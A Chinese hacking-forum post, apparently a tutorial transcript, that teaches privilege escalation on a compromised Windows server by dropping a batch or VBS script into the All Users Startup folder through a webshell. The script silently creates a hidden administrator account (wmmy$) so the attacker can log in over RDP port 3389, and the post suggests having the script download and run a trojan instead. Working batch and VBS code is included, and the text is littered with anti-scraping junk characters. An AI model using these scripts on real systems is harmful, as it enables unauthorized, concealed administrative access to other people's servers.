|
  
- 帖子
- 575
- 积分
- 1897
- 威望
- 2479
- 金钱
- 15930
- 在线时间
- 175 小时
             
|
大家好,我是完美蚂蚁 今天给大家带来的提权教程是& N7 ` r6 c: \
启动 提权* ~4 |8 e) V& [* C6 \) `
C:\Docume~1\All Users\「开始」菜单\程序\启动
) K0 I) i6 y3 w& h在这里必须有写入权限 否则此方法无效1 m( [- s% E6 X* h5 _
因为我是在网吧 这里显示不了路径
4 t& `2 |" l$ H$ @我去服务器上演示给大家看
* f& H' W9 ^+ m- @* Y% @0 o大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
- w/ C2 ^0 Y- }1 i文件 从而运行我们的文件+ ? ^. \+ X! n" s
这里有两中方式 第一种是批处理9 H" m' A1 Y4 t. O. o& A1 }; Q
我们来看下目前 我机器上的用户组
( I, J. d7 J6 j9 w$ ?# Z& y目前我们没有521这个用户
t2 T; k& X* e# h( G# l0 s看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示) g: E% G* S. [6 `+ y# q r
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现" t4 O4 C. E2 |7 g1 k8 W/ z* j
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的' q2 }. b2 c& R3 h* x3 r
大家看 已经成功加入了WMMY用户9 S1 a, H2 w ~5 o) L; b2 ]
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了9 b) I3 n+ j0 c# Z) b7 X) m
当前终端服务端口: 3389, i* Y/ E1 _% E- W6 F
系统自动登录功能未开启) y% t5 }- |- W2 h4 S Y$ K& h
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
9 [9 Y0 P8 w* l2 I% FC:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
6 |3 Y: r; d( v第一种隐蔽性太差 我们就用第二种吧
" {* k# o" s Y7 a: K0 h) f已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
7 j" F" W; D0 H0 { u从而取得了3389的登陆权限0 X! {7 P. r. k7 i2 q
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马3 G, r' U* D9 N. j5 E
基本原理都差不多 我就不多介绍了# N+ v, j' L; z# i' y) x9 i4 I# j
教程结束```
( I% o% t3 M" A3 _& [@echo off) M, V: p7 @4 G# |5 G
net user 521 521 /add" I; L- L. g7 l d/ k- ^
net localgroup administrators 521 /add! Z2 l$ e8 k N' N5 j. V' X6 @
( u8 H8 X* A, @3 b' \! hon Error Resume next
0 q& @* L2 x3 A1 Xset wshshell=createobject("wscript.shell")
6 D5 ~% ]0 ^0 [# ]4 g( ra=wshshell.run("net user wmmy$ 1227 /add",0)
) o, s9 ^, l+ ]; A7 _6 W" m/ `a=wshshell.run("net localgroup administrators wmmy$ /add",0)
9 m5 H! m7 v A- q& B& J9 y
$ |8 h0 C- K# G& q( {: i2 N
% ]4 z) G# s/ x$ ]$ E点击下载
$ ^0 ?% p7 Y5 z8 {9 t2 d0 e |
-
2
评分人数
-
|